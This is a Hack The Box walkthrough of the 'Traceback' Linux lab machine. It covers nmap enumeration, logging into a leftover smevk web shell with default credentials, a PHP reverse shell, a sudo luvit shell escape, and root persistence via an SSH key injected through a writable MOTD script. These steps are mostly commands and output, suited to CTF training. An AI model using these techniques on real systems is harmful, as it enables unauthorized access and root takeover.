Redhalo

hack the box walkthrough – Traceback machine

Here we go again today with a new HTB walkthrough – an easy linux machine: Traceback!

Let’s jump it!

Enumeration

Our nmap (via nmapAutomator) gave me the following output:

[email protected]:~/Documents/nmapAutomator$ ./nmapAutomator.sh 10.129.1.189 Full
Running a Full scan on 10.129.1.189
Host is likely running Linux
---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:39 EST
Initiating Parallel DNS resolution of 1 host. at 08:39
Completed Parallel DNS resolution of 1 host. at 08:39, 0.01s elapsed
Initiating Connect Scan at 08:39
Scanning 10.129.1.189 [65535 ports]
Discovered open port 80/tcp on 10.129.1.189
Discovered open port 22/tcp on 10.129.1.189
Warning: 10.129.1.189 giving up on port because retransmission cap hit (1).
Connect Scan Timing: About 22.93% done; ETC: 08:41 (0:01:44 remaining)
Connect Scan Timing: About 44.95% done; ETC: 08:41 (0:01:15 remaining)
Connect Scan Timing: About 67.50% done; ETC: 08:41 (0:00:44 remaining)
Completed Connect Scan at 08:41, 136.79s elapsed (65535 total ports)
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
Not shown: 64757 closed ports, 776 filtered ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 136.88 seconds
Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-30 08:41 EST
Nmap scan report for 10.129.1.189
Host is up (0.025s latency).
PORT   STATE SERVICE VERSION                                                                                                                                                                                                               
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)                                                                                                                                                          
| ssh-hostkey:                                                                                                                                                                                                                             
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)                                                                                                                                                                             
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)                                                                                                                                                                            
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)                                                                                                                                                                          
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                                                                                                                                                                                        
|_http-server-header: Apache/2.4.29 (Ubuntu)                                                                                                                                                                                               
|_http-title: Help us                                                                                                                                                                                                                      
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds

---------------------Finished all Nmap scans---------------------
                                                                                                                                                                                                                                           
Completed in 2 minute(s) and 25 second(s)

On port 80 I had the following weird web page:

The code source of this page showed a hint:

<!--Some of the best web shells that you might need ;)-->

With a quick OSINT search I found the following github with a list of webshell : https://github.com/TheBinitGhimire/Web-Shells

I had to test all web shell listed one by one and found that smevk.php is existing:

The smevk default credentials let me in (admin/admin)

Foothold

I could upload the php-reverse-shell.php included in Kali Linux in /usr/share/webshells/php/ to get my reverse shell

Don’t forget to edit the variable with your IP address and your listening port:

[email protected]:/home/webadmin$ whoami && id
webadmin
uid=1000(webadmin) gid=1000(webadmin) groups=1000(webadmin),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)

I am in!

Lateral Movement

Looking in the home folder, I found a file note.txt containing the following:

[email protected]:/home/webadmin$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
[email protected]:/home/webadmin$ 

Looking at sudo -l, I got the following output:

[email protected]:/home/webadmin$ sudo -l
Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
[email protected]:/home/webadmin$ 

the goal is to spawn the shell with sysadmin permission. I have create a lua file with the following content:

[email protected]:/home/webadmin$ cat privesc.lua 
os.execute("/bin/sh")

Then the following command to reach my goal:

[email protected]:/home/webadmin$ sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
$ whoami && id
sysadmin
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)
$ 

Privilege Escalation

A linpeas scan showed me a potential escalation vector here:

update-motd.d is the folder which contains the script which generate the Messge Of The Day when you connect via SSH for example.

And it seems I have write permission. So I can use it to add my SSH public key into the root’s authorized_keys file

First at all I need sysadmin’s SSH access:

[email protected]:~/Documents$ ssh-keygen
Generating public/private rsa key pair.                                                                                                                                                                                                    
Enter file in which to save the key (/home/kali/.ssh/id_rsa):                                                                                                                                                                              
Enter passphrase (empty for no passphrase):                                                                                                                                                                                                
Enter same passphrase again:                                                                                                                                                                                                               
Your identification has been saved in /home/kali/.ssh/id_rsa                                                                                                                                                                               
Your public key has been saved in /home/kali/.ssh/id_rsa.pub                                                                                                                                                                               
The key fingerprint is:
SHA256:fHyPIzh7o1WdlFcPmJav3hY8X56oFttw+m3e11GgC5E [email protected]
The key's randomart image is:
+---[RSA 3072]----+
|           . +. .|
|          E = .oo|
|           o oo.o|
|       . .. .o.o.|
|        S o.o+o .|
|         o =o++..|
|        o o.X.o==|
|         +o=.++o*|
|        oo.oooooo|
+----[SHA256]-----+
[email protected]:~/Documents$ cat /home/kali/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected]

I add our public key to sysadmin’s authorized_keys

echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected]" >> /home/sysadmin/.ssh/authorized_keys

I test our connection:

[email protected]:~/Documents$ ssh -i /home/kali/.ssh/id_rsa [email protected]
The authenticity of host '10.129.1.189 (10.129.1.189)' can't be established.
ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.1.189' (ECDSA) to the list of known hosts.
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key '/home/kali/.ssh/id_rsa': 

Welcome to Xh4H land 

Last login: Mon Mar 16 03:50:24 2020 from 10.10.14.2

Looks fine. Then now I edit the 00-header file as following:

cat 00-header
#!/bin/sh
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland 
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release


echo "\nWelcome to Xh4H land \n"
echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDXM3x2sl3A/kyQoBJsbMV7R4qSZwcMrXdDpwkyb3jSTCfSvJbNlo+/WCgF8z5oYyTWIShKNXjJqs9PEbdk42Qob0HtYaXtDvcpC3OAqm57/5iT31GvV0+uAQanaxYFGK6QMw4Gti2Oxf5QAZjA/C5LIH8Ivq4+VJuy1gbUoiYZjR+VQi+akjnmPc+XiC6bYFNVef2w3yDTC5urfJuHwqXZiP0EzChtYZHqT5/3/s+3/Bs5EGfEgVdkMkna3U9sAyjBXOOJ82l2/PQzWEML32B+pI7AbUIeI+Q/uUxR8WgnBo96GwEe1Uihi/yPd0H33gBxXovhYh9qsJOA22SGDJfyLthlZJ3S8AVLbGdWtV80ckD18QGZzS+zBhuUjK2w1bQAclV3Gz1MubEjWDFjn4bgADw/qvzucvO7Fgt532D4jW3J35TBb6G//PsK8kuUcqB15aIRvAWhB4bKLqx+USJKw3rGQPC1hDO5178UaZsfAE6c1Qc5v1AuuwGNEmijvdU= [email protected] >> /root/.ssh/authorized_keys

I connect first to sysadmin SSH then with root.

[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa': 

Welcome to Xh4H land 



Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sat Jan 30 08:10:49 2021 from 10.10.14.40
$ exit
Connection to 10.129.1.189 closed.
[email protected]:~/.ssh$ ssh -i id_rsa [email protected]
#################################
-------- OWNED BY XH4H  ---------
- I guess stuff could have been configured better ^^ -
#################################
Enter passphrase for key 'id_rsa': 

Welcome to Xh4H land 

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Fri Jan 24 03:43:29 2020
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)

And I am root ! Looks like my public ssh key has been correctly copied to root’s authorized_keys

EXTRA

Looking at the official HTB write up I learnt that I could use pspy (https://github.com/DominicBreuker/pspy) and found out that a process was running every 30 seconds to copy the motd script from a backup:

/bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/